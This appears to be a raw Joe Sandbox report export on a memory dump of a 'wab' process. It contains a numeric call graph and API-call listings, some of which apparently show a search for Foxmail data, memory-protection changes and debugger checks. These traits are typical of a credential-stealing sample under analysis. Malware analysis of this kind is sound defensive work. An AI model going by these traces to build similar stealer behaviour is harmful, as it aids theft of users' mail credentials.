7208->7008 7210 3756246e 7209->7210 7211 3756499b 28 API calls 7209->7211 7210->7008 7212 37564bbd 7211->7212 7212->7008 7225 375634c7 RtlInterlockedFlushSList 7213->7225 7215 37562312 7215->7010 7227 3756246f 7216->7227 7218 375620c9 7218->7012 7220 37562617 7219->7220 7221 3756262d 7220->7221 7246 375653ed 7220->7246 7221->7014 7224 37563529 8 API calls 7224->7221 7226 375634d7 7225->7226 7226->7215 7232 375653ff 7227->7232 7230 3756391b 6 API calls 7231 3756354d 7230->7231 7231->7218 7235 37565c2b 7232->7235 7236 37565c35 7235->7236 7237 37562476 7235->7237 7239 37565db2 7236->7239 7237->7230 7240 37565c45 5 API calls 
7239->7240 7241 37565dd9 7240->7241 7242 37565df1 TlsFree 7241->7242 7243 37565de5 7241->7243 7242->7243 7244 37562ada 5 API calls 7243->7244 7245 37565e02 7244->7245 7245->7237 7249 375674da 7246->7249 7252 375674f3 7249->7252 7250 37562ada 5 API calls 7251 37562625 7250->7251 7251->7224 7252->7250 7686 3756508a 7687 375650a2 7686->7687 7688 3756509c 7686->7688 7689 37565000 20 API calls 7688->7689 7689->7687 6481 37567b48 6491 37568ebf 6481->6491 6485 37567b55 6504 3756907c 6485->6504 6488 37567b7f 6489 3756571e 20 API calls 6488->6489 6490 37567b8a 6489->6490 6508 37568ec8 6491->6508 6493 37567b50 6494 37568fdc 6493->6494 6495 37568fe8 6494->6495 6528 37565671 RtlEnterCriticalSection 6495->6528 6497 3756905e 6542 37569073 6497->6542 6499 3756906a 6499->6485 6500 37569032 RtlDeleteCriticalSection 6502 3756571e 20 API calls 6500->6502 6503 37568ff3 6502->6503 6503->6497 6503->6500 6529 3756a09c 6503->6529 6505 37569092 6504->6505 6507 37567b64 RtlDeleteCriticalSection 6504->6507 6506 3756571e 20 API calls 6505->6506 6505->6507 6506->6507 6507->6485 6507->6488 6509 37568ed4 6508->6509 6518 37565671 RtlEnterCriticalSection 6509->6518 6511 37568f77 6523 37568f97 6511->6523 6515 37568ee3 6515->6511 6517 37568e78 66 API calls 6515->6517 6519 37567b94 RtlEnterCriticalSection 6515->6519 6520 37568f6d 6515->6520 6516 37568f83 6516->6493 6517->6515 6518->6515 6519->6515 6526 37567ba8 RtlLeaveCriticalSection 6520->6526 6522 37568f75 6522->6515 6527 375656b9 RtlLeaveCriticalSection 6523->6527 6525 37568f9e 6525->6516 6526->6522 6527->6525 6528->6503 6530 3756a0a8 6529->6530 6531 3756a0ce 6530->6531 6532 3756a0b9 6530->6532 6541 3756a0c9 6531->6541 6545 37567b94 RtlEnterCriticalSection 6531->6545 6533 37566368 20 API calls 6532->6533 6534 3756a0be 6533->6534 6536 375662ac 26 API calls 6534->6536 6536->6541 6537 3756a0ea 6546 3756a026 6537->6546 6539 3756a0f5 6562 3756a112 6539->6562 6541->6503 6810 375656b9 RtlLeaveCriticalSection 6542->6810 6544 3756907a 6544->6499 
6545->6537 6547 3756a033 6546->6547 6548 3756a048 6546->6548 6549 37566368 20 API calls 6547->6549 6554 3756a043 6548->6554 6565 37568e12 6548->6565 6551 3756a038 6549->6551 6553 375662ac 26 API calls 6551->6553 6553->6554 6554->6539 6555 3756907c 20 API calls 6556 3756a064 6555->6556 6571 37567a5a 6556->6571 6558 3756a06a 6578 3756adce 6558->6578 6561 3756571e 20 API calls 6561->6554 6809 37567ba8 RtlLeaveCriticalSection 6562->6809 6564 3756a11a 6564->6541 6566 37568e2a 6565->6566 6568 37568e26 6565->6568 6567 37567a5a 26 API calls 6566->6567 6566->6568 6569 37568e4a 6567->6569 6568->6555 6593 37569a22 6569->6593 6572 37567a66 6571->6572 6573 37567a7b 6571->6573 6574 37566368 20 API calls 6572->6574 6573->6558 6575 37567a6b 6574->6575 6576 375662ac 26 API calls 6575->6576 6577 37567a76 6576->6577 6577->6558 6579 3756adf2 6578->6579 6580 3756addd 6578->6580 6581 3756ae2d 6579->6581 6585 3756ae19 6579->6585 6582 37566355 20 API calls 6580->6582 6583 37566355 20 API calls 6581->6583 6584 3756ade2 6582->6584 6586 3756ae32 6583->6586 6587 37566368 20 API calls 6584->6587 6766 3756ada6 6585->6766 6589 37566368 20 API calls 6586->6589 6590 3756a070 6587->6590 6591 3756ae3a 6589->6591 6590->6554 6590->6561 6592 375662ac 26 API calls 6591->6592 6592->6590 6594 37569a2e 6593->6594 6595 37569a36 6594->6595 6596 37569a4e 6594->6596 6618 37566355 6595->6618 6598 37569aec 6596->6598 6602 37569a83 6596->6602 6600 37566355 20 API calls 6598->6600 6603 37569af1 6600->6603 6601 37566368 20 API calls 6604 37569a43 6601->6604 6621 37568c7b RtlEnterCriticalSection 6602->6621 6606 37566368 20 API calls 6603->6606 6604->6568 6608 37569af9 6606->6608 6607 37569a89 6609 37569aa5 6607->6609 6610 37569aba 6607->6610 6611 375662ac 26 API calls 6608->6611 6613 37566368 20 API calls 6609->6613 6622 37569b0d 6610->6622 6611->6604 6614 37569aaa 6613->6614 6615 37566355 20 API calls 6614->6615 6617 37569ab5 6615->6617 6673 37569ae4 6617->6673 6619 37565b7a 20 API calls 6618->6619 6620 3756635a 
6619->6620 6620->6601 6621->6607 6623 37569b3b 6622->6623 6661 37569b34 6622->6661 6624 37569b5e 6623->6624 6625 37569b3f 6623->6625 6628 37569baf 6624->6628 6629 37569b92 6624->6629 6627 37566355 20 API calls 6625->6627 6626 37562ada 5 API calls 6630 37569d15 6626->6630 6631 37569b44 6627->6631 6633 37569bc5 6628->6633 6676 3756a00b 6628->6676 6632 37566355 20 API calls 6629->6632 6630->6617 6634 37566368 20 API calls 6631->6634 6635 37569b97 6632->6635 6679 375696b2 6633->6679 6637 37569b4b 6634->6637 6639 37566368 20 API calls 6635->6639 6640 375662ac 26 API calls 6637->6640 6644 37569b9f 6639->6644 6640->6661 6642 37569bd3 6645 37569bd7 6642->6645 6646 37569bf9 6642->6646 6643 37569c0c 6648 37569c66 WriteFile 6643->6648 6649 37569c20 6643->6649 6647 375662ac 26 API calls 6644->6647 6650 37569ccd 6645->6650 6686 37569645 6645->6686 6691 37569492 GetConsoleCP 6646->6691 6647->6661 6652 37569c89 GetLastError 6648->6652 6660 37569bef 6648->6660 6653 37569c56 6649->6653 6654 37569c28 6649->6654 6650->6661 6662 37566368 20 API calls 6650->6662 6652->6660 6717 37569728 6653->6717 6657 37569c46 6654->6657 6658 37569c2d 6654->6658 6709 375698f5 6657->6709 6658->6650 6702 37569807 6658->6702 6660->6650 6660->6661 6664 37569ca9 6660->6664 6661->6626 6663 37569cf2 6662->6663 6666 37566355 20 API calls 6663->6666 6667 37569cc4 6664->6667 6668 37569cb0 6664->6668 6666->6661 6724 37566332 6667->6724 6670 37566368 20 API calls 6668->6670 6671 37569cb5 6670->6671 6672 37566355 20 API calls 6671->6672 6672->6661 6765 37568c9e RtlLeaveCriticalSection 6673->6765 6675 37569aea 6675->6604 6729 37569f8d 6676->6729 6751 37568dbc 6679->6751 6681 375696c2 6682 375696c7 6681->6682 6683 37565af6 38 API calls 6681->6683 6682->6642 6682->6643 6684 375696ea 6683->6684 6684->6682 6685 37569708 GetConsoleMode 6684->6685 6685->6682 6689 3756969f 6686->6689 6690 3756966a 6686->6690 6687 3756a181 WriteConsoleW CreateFileW 6687->6690 6688 375696a1 GetLastError 6688->6689 6689->6660 6690->6687 
6690->6688 6690->6689 6692 37569607 6691->6692 6696 375694f5 6691->6696 6693 37562ada 5 API calls 6692->6693 6694 37569641 6693->6694 6694->6660 6696->6692 6697 3756957b WideCharToMultiByte 6696->6697 6699 375679e6 40 API calls 6696->6699 6701 375695d2 WriteFile 6696->6701 6760 37567c19 6696->6760 6697->6692 6698 375695a1 WriteFile 6697->6698 6698->6696 6700 3756962a GetLastError 6698->6700 6699->6696 6700->6692 6701->6696 6701->6700 6707 37569816 6702->6707 6703 375698d8 6704 37562ada 5 API calls 6703->6704 6708 375698f1 6704->6708 6705 37569894 WriteFile 6706 375698da GetLastError 6705->6706 6705->6707 6706->6703 6707->6703 6707->6705 6708->6660 6714 37569904 6709->6714 6710 37569a0f 6711 37562ada 5 API calls 6710->6711 6713 37569a1e 6711->6713 6712 37569986 WideCharToMultiByte 6715 37569a07 GetLastError 6712->6715 6716 375699bb WriteFile 6712->6716 6713->6660 6714->6710 6714->6712 6714->6716 6715->6710 6716->6714 6716->6715 6718 37569737 6717->6718 6719 375697ea 6718->6719 6721 375697a9 WriteFile 6718->6721 6720 37562ada 5 API calls 6719->6720 6722 37569803 6720->6722 6721->6718 6723 375697ec GetLastError 6721->6723 6722->6660 6723->6719 6725 37566355 20 API calls 6724->6725 6726 3756633d 6725->6726 6727 37566368 20 API calls 6726->6727 6728 37566350 6727->6728 6728->6661 6738 37568d52 6729->6738 6731 37569f9f 6732 37569fa7 6731->6732 6733 37569fb8 SetFilePointerEx 6731->6733 6734 37566368 20 API calls 6732->6734 6735 37569fd0 GetLastError 6733->6735 6736 37569fac 6733->6736 6734->6736 6737 37566332 20 API calls 6735->6737 6736->6633 6737->6736 6739 37568d5f 6738->6739 6742 37568d74 6738->6742 6740 37566355 20 API calls 6739->6740 6741 37568d64 6740->6741 6744 37566368 20 API calls 6741->6744 6743 37566355 20 API calls 6742->6743 6745 37568d99 6742->6745 6746 37568da4 6743->6746 6748 37568d6c 6744->6748 6745->6731 6747 37566368 20 API calls 6746->6747 6749 37568dac 6747->6749 6748->6731 6750 375662ac 26 API calls 6749->6750 6750->6748 6752 37568dc9 6751->6752 
6754 37568dd6 6751->6754 6753 37566368 20 API calls 6752->6753 6755 37568dce 6753->6755 6756 37568de2 6754->6756 6757 37566368 20 API calls 6754->6757 6755->6681 6756->6681 6758 37568e03 6757->6758 6759 375662ac 26 API calls 6758->6759 6759->6755 6761 37565af6 38 API calls 6760->6761 6762 37567c24 6761->6762 6763 37567a00 38 API calls 6762->6763 6764 37567c34 6763->6764 6764->6696 6765->6675 6769 3756ad24 6766->6769 6768 3756adca 6768->6590 6770 3756ad30 6769->6770 6780 37568c7b RtlEnterCriticalSection 6770->6780 6772 3756ad3e 6773 3756ad65 6772->6773 6774 3756ad70 6772->6774 6781 3756ae4d 6773->6781 6776 37566368 20 API calls 6774->6776 6777 3756ad6b 6776->6777 6796 3756ad9a 6777->6796 6779 3756ad8d 6779->6768 6780->6772 6782 37568d52 26 API calls 6781->6782 6784 3756ae5d 6782->6784 6783 3756ae63 6799 37568cc1 6783->6799 6784->6783 6786 3756ae95 6784->6786 6789 37568d52 26 API calls 6784->6789 6786->6783 6787 37568d52 26 API calls 6786->6787 6790 3756aea1 CloseHandle 6787->6790 6792 3756ae8c 6789->6792 6790->6783 6793 3756aead GetLastError 6790->6793 6791 3756aedd 6791->6777 6795 37568d52 26 API calls 6792->6795 6793->6783 6794 37566332 20 API calls 6794->6791 6795->6786 6808 37568c9e RtlLeaveCriticalSection 6796->6808 6798 3756ada4 6798->6779 6800 37568d37 6799->6800 6801 37568cd0 6799->6801 6802 37566368 20 API calls 6800->6802 6801->6800 6807 37568cfa 6801->6807 6803 37568d3c 6802->6803 6804 37566355 20 API calls 6803->6804 6805 37568d27 6804->6805 6805->6791 6805->6794 6806 37568d21 SetStdHandle 6806->6805 6807->6805 6807->6806 6808->6798 6809->6564 6810->6544 6811 37565348 6814 37563529 6811->6814 6815 37563543 6814->6815 6816 37563532 6814->6816 6822 3756391b 6816->6822 6823 37563925 6822->6823 6824 37563537 6822->6824 6834 37563b2c 6823->6834 6826 37563972 6824->6826 6827 3756353c 6826->6827 6828 3756397d 6826->6828 6830 37563c50 6827->6830 6829 37563987 RtlDeleteCriticalSection 6828->6829 6829->6827 6829->6829 6831 37563c59 6830->6831 6832 37563c7f 
6830->6832 6831->6832 6833 37563c69 FreeLibrary 6831->6833 6832->6815 6833->6831 6839 37563a82 6834->6839 6836 37563b46 6837 37563b5e TlsFree 6836->6837 6838 37563b52 6836->6838 6837->6838 6838->6824 6840 37563aaa 6839->6840 6844 37563aa6 6839->6844 6840->6844 6845 375639be 6840->6845 6843 37563ac4 GetProcAddress 6843->6844 6844->6836 6849 375639cd 6845->6849 6846 37563a77 6846->6843 6846->6844 6847 375639ea LoadLibraryExW 6848 37563a05 GetLastError 6847->6848 6847->6849 6848->6849 6849->6846 6849->6847 6850 37563a60 FreeLibrary 6849->6850 6851 37563a38 LoadLibraryExW 6849->6851 6850->6849 6851->6849 7690 37568a89 7691 37566d60 51 API calls 7690->7691 7692 37568a8e 7691->7692 7693 37563eb3 7694 37565411 38 API calls 7693->7694 7695 37563ebb 7694->7695 6852 37563370 6863 37563330 6852->6863 6864 37563342 6863->6864 6865 3756334f 6863->6865 6866 37562ada 5 API calls 6864->6866 6866->6865 7253 37565630 7256 3756563b 7253->7256 7255 37565664 7266 37565688 7255->7266 7256->7255 7257 37565660 7256->7257 7259 37565eb7 7256->7259 7260 37565c45 5 API calls 7259->7260 7261 37565ede 7260->7261 7262 37565efc InitializeCriticalSectionAndSpinCount 7261->7262 7263 37565ee7 7261->7263 7262->7263 7264 37562ada 5 API calls 7263->7264 7265 37565f13 7264->7265 7265->7256 7267 375656b4 7266->7267 7268 37565695 7266->7268 7267->7257 7269 3756569f RtlDeleteCriticalSection 7268->7269 7269->7267 7269->7269 7596 375663f0 7597 37566400 7596->7597 7600 37566416 7596->7600 7598 37566368 20 API calls 7597->7598 7599 37566405 7598->7599 7602 375662ac 26 API calls 7599->7602 7606 37566561 7600->7606 7609 37566480 7600->7609 7615 37566580 7600->7615 7601 37564e76 20 API calls 7608 375664e5 7601->7608 7610 3756640f 7602->7610 7604 375664ee 7605 3756571e 20 API calls 7604->7605 7605->7606 7635 3756679a 7606->7635 7608->7604 7612 37566573 7608->7612 7626 375685eb 7608->7626 7609->7601 7613 375662bc 11 API calls 7612->7613 7614 3756657f 7613->7614 7616 3756658c 7615->7616 7616->7616 7617 3756637b 20 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37561137
• lstrcatW.KERNEL32(?,?), ref: 37561151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756117C
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37561193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 375611D0
• FindClose.KERNELBASE(00000000), ref: 375611DB
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 8bba3af6ec4be3ba0efbcf72f37173bee688940de6224bd0f5d877452d86f6de
• Instruction ID: f7f50446d4424fea188da2fa837c9596bb7df22b9fd5f8169dd08c201d462f41
• Opcode Fuzzy Hash: 8bba3af6ec4be3ba0efbcf72f37173bee688940de6224bd0f5d877452d86f6de
• Instruction Fuzzy Hash: 142185715443486BD714EA649C4DF9B7B9CEF84324F000D2AF998E3190FB79D60587D6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNELBASE(00000005), ref: 034A39C1
• NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 034A3A0E
Memory Dump Source
• Source File: 00000002.00000002.16907433078.00000000030B1000.00000040.00000400.00020000.00000000.sdmp, Offset: 030B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_30b1000_wab.jbxd
Yara matches
Similarity
• API ID: MemoryProtectSleepVirtual
• String ID:
• API String ID: 3235210055-0
• Opcode ID: 48b640ef072aa8f77f74ce3f5f828450ba3550b315b2660e59a810925b7d958c
• Instruction ID: 71e581a97e8bf692c7dd045da3408f7a864d9a953bbd5e196255cbe19645afaa
• Opcode Fuzzy Hash: 48b640ef072aa8f77f74ce3f5f828450ba3550b315b2660e59a810925b7d958c
• Instruction Fuzzy Hash: A41189B9900B019FEB01AE7DC99CB867379AF247E1F894288ED654F1E6E374C4808F11
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37561434
  • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37561137
  • Part of subcall function 375610F1: lstrcatW.KERNEL32(?,?), ref: 37561151
  • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756115C
  • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756116D
  • Part of subcall function 375610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3756117C
  • Part of subcall function 375610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37561193
  • Part of subcall function 375610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 375611D0
  • Part of subcall function 375610F1: FindClose.KERNELBASE(00000000), ref: 375611DB
• lstrlenW.KERNEL32(?), ref: 375614C5
• lstrlenW.KERNEL32(?), ref: 375614E0
• lstrlenW.KERNEL32(?,?), ref: 3756150F
• lstrcatW.KERNEL32(00000000), ref: 37561521
• lstrlenW.KERNEL32(?,?), ref: 37561547
• lstrcatW.KERNEL32(00000000), ref: 37561553
• lstrlenW.KERNEL32(?,?), ref: 37561579
• lstrcatW.KERNEL32(00000000), ref: 37561585
• lstrlenW.KERNEL32(?,?), ref: 375615AB
• lstrcatW.KERNEL32(00000000), ref: 375615B7
Strings
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: e2c625e96b080f242c7989307f553c2e724ad8187ae6b831f2871fc2a0464ef5
• Instruction ID: 3f2361390d71e1b41c75dca58918dd6446691fcc3f2259c7257a7c9aced71230
• Opcode Fuzzy Hash: e2c625e96b080f242c7989307f553c2e724ad8187ae6b831f2871fc2a0464ef5
• Instruction Fuzzy Hash: 4381E1B1A00358AADB24DBA0DC89FEF733CEF84710F101596F908E7180EA755A84CF96
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(3756C7DD), ref: 3756C7E6
• GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
  • Part of subcall function 3756C803: GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
  • Part of subcall function 3756C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
  • Part of subcall function 3756C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
Memory Dump Source
• Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
• Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37560000_wab.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: cdf5899ae09d6b5445586d128cd204cface1726b12458507888f15fafa0265e7
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: B301266054534038B63852780C0CABA5FD89B63EBCB903B57E000DB093C958F501C3F6
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 80 3756c7a7-3756c7bc 81 3756c7be-3756c7c6 80->81 82 3756c82d 80->82 81->82 84 3756c7c8-3756c7f6 call 3756c7e6 81->84 83 3756c82f-3756c833 82->83 85 3756c835-3756c83d GetModuleHandleA 83->85 86 3756c872 call 3756c877 83->86 92 3756c86c 84->92 93 3756c7f8 84->93 89 3756c83f-3756c847 85->89 89->89 91 3756c849-3756c84c 89->91 91->83 95 3756c84e-3756c850 91->95 94 3756c86d-3756c86e 92->94 96 3756c7fa-3756c7fc 93->96 97 3756c85b-3756c85e 93->97 98 3756c866-3756c86b 94->98 99 3756c870 94->99 101 3756c856-3756c85a 95->101 102 3756c852-3756c854 95->102 96->94 103 3756c7fe 96->103 100 3756c85f-3756c860 GetProcAddress 97->100 98->92 99->91 104 3756c865 100->104 101->97 102->100 103->104 105 3756c800-3756c80b GetProcAddress 103->105 104->98 105->82 106 3756c80d-3756c81a VirtualProtect 105->106 107 3756c82c 106->107 108 3756c81c-3756c82a VirtualProtect 106->108 107->82 108->107
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: GetModuleHandleA.KERNEL32(3756C7DD), ref: 3756C7E6
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
                                                                                                                                                                                                            • Part of subcall function 3756C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction ID: 6366ae090b5b607d60adcb279f1dcfa97e0a4090f9d4d81b2a0ea5fe1a908b33
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D2105754082816EF7358A744C0C7A66FD89B57AB8F582697D040CB183D5A8B445C3E2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 109 3756c803-3756c80b GetProcAddress 110 3756c82d 109->110 111 3756c80d-3756c81a VirtualProtect 109->111 114 3756c82f-3756c833 110->114 112 3756c82c 111->112 113 3756c81c-3756c82a VirtualProtect 111->113 112->110 113->112 115 3756c835-3756c83d GetModuleHandleA 114->115 116 3756c872 call 3756c877 114->116 118 3756c83f-3756c847 115->118 118->118 119 3756c849-3756c84c 118->119 119->114 120 3756c84e-3756c850 119->120 121 3756c856-3756c85e 120->121 122 3756c852-3756c854 120->122 124 3756c85f-3756c865 GetProcAddress 121->124 122->124 126 3756c866-3756c86e 124->126 129 3756c870 126->129 129->119
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,3756C7F4), ref: 3756C804
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C816
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3756C7F4,3756C7DD), ref: 3756C82A
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,3756C7DD), ref: 3756C838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 3756C860
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction ID: 4414b269ba67b138ee8bc5725c63d1c014476c683d74b49e57ab612072fee23a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0C2A55453403CFA3945B80C4DABA5FCC8B67EB8B503A57E104CB183D899B50683F6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 37562645
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 37562710
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 37562730
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 3756273A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_37560000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: 59dccf956b14e3f7c8f4702a33d7356d99343eedcc863828d49b27dee2b4d864
                                                                                                                                                                                                          • Instruction ID: 4f769350c2632270dac2e66a897b0b4739583d886f149200b7dbd0fcf98a9520
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59dccf956b14e3f7c8f4702a33d7356d99343eedcc863828d49b27dee2b4d864
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4312775D45318DBDB14DFA4C989BCDBBB8AF08308F1051AAE40CBB250EB799A858F45
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 37562276
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 37562285
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 3756228E
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 3756229B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.16935655865.0000000037561000.00000040.00001000.00020000.00000000.sdmp, Offset: 37560000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935621689.0000000037560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000002.00000002.16935655865.0000000037576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
